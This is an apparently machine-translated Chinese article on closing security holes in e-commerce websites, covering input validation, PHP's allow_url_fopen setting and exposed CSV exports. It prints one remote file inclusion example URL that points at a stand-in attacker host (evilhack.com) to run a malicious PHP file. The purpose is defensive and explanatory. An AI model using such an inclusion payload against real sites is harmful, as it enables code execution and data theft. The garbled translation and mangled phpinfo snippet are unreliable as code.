電子商務安全-堵塞安全漏洞

安全電子商務網站必須有一個重要的考慮因素在發展電子商務的網站或軟件。開發人員需要知道的所有的安全考慮，在設計網站。隨著電子商務的日益普及，這些天，安全攻擊數量肯定增加。偏執狂是健康的電子商務網站開發人員，我們必須跟上大門與安全問題，並保持我們的耳朵和眼睛打開。雖然以下漏洞嚴重的，如果存在以下漏洞很容易修復。

下面列出了一些安全方面的考慮應包括在開發一個網站。本文不包括電子買，請參閱我在這條分開。

用戶輸入-每個輸入，無論是進入了一個數量，產品搜索，輸入一個名稱等，需要得到確認可疑人物。如果不這樣做，它有可能進入"?>",閉幕結束標記的PHP和執行一些PHP代碼。

這是更加安全，讓數字和字符宰（包括資金）和0-9，沒有別的，而不是使所有的列表的字符不應該存在。驗證腳本需要每個字符滾動逐一。這需要取得使用服務器端驗證，與JavaScript。使用服務器端的輸入驗證是必需的不需要的字符

另一個主要存在在執行PHP代碼。當使用PHP有一個叫做allow_url_fopen選項設置使開放的文件從一個PHP腳本。此設置應關閉，除非絕對必要的。

試想你的PHP腳本為固定頁眉和頁腳，並訪問您的網頁您可以鍵入在http://www.mysite.com/index.php?page=page2。它採取的所有是一個惡意用戶運行一個腳本通過修改這些參數中鍵入的“http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt”與一些PHP代碼文件中的“hacker.txt”。你可以有任何事情發生，PHP文件閱讀，刪除，重要信息被盜。

如果您不知道此設置或關閉，請複製下面的PHP代碼到一個文本文件，並將其上傳到您的Web服務器：

phpinfo（）函數;
？“

當您訪問您的網絡服務器上的腳本，你應該遇到設立allow_url_fopen選項下的配置。

計算機用戶，一般情況下無法找到此設定值。

小心數據如出口訂單，產品在CSV和MySQL文件。如果這些數據是從腳本導出並保存在Web服務器上在一個共同文件的名稱，即。 http://www.mysite.com/admin/output_tables.csv。這僅僅是一個真正的問題時，導出的數據駐留在一個文件中的目錄中向公眾開放。有兩種方法來防止這種安全漏洞-首先輸出文件背後的密碼保護的目錄，其次有數據位於內的HTML textarea的表單元素上的腳本。該店主可以複製此信息的文本文件，並創建一個新文件在他們的計算機和信息粘貼在這裡。

只需要一黑客找到這個文件，通過檢出電子商務軟件的演示網站，尋找相同的文件名上真正的網站。

Rate Article

Related Videos
Play Video How to Strengthen Network Security with Cisco Network Manager	Play Video Understanding your Home Network Router #5 - Secure Your Network with WPA2	Play Video 了解關於安全計算	播放視頻 如何讓您的電腦安全	播放視頻 如何檢查安全設置在Windows Vista

下面列出了更多的文章與上述文章的“電子商務”類物品。

人們感興趣的上述文章“電子商務安全-堵塞安全漏洞”也有興趣在有關條款如下：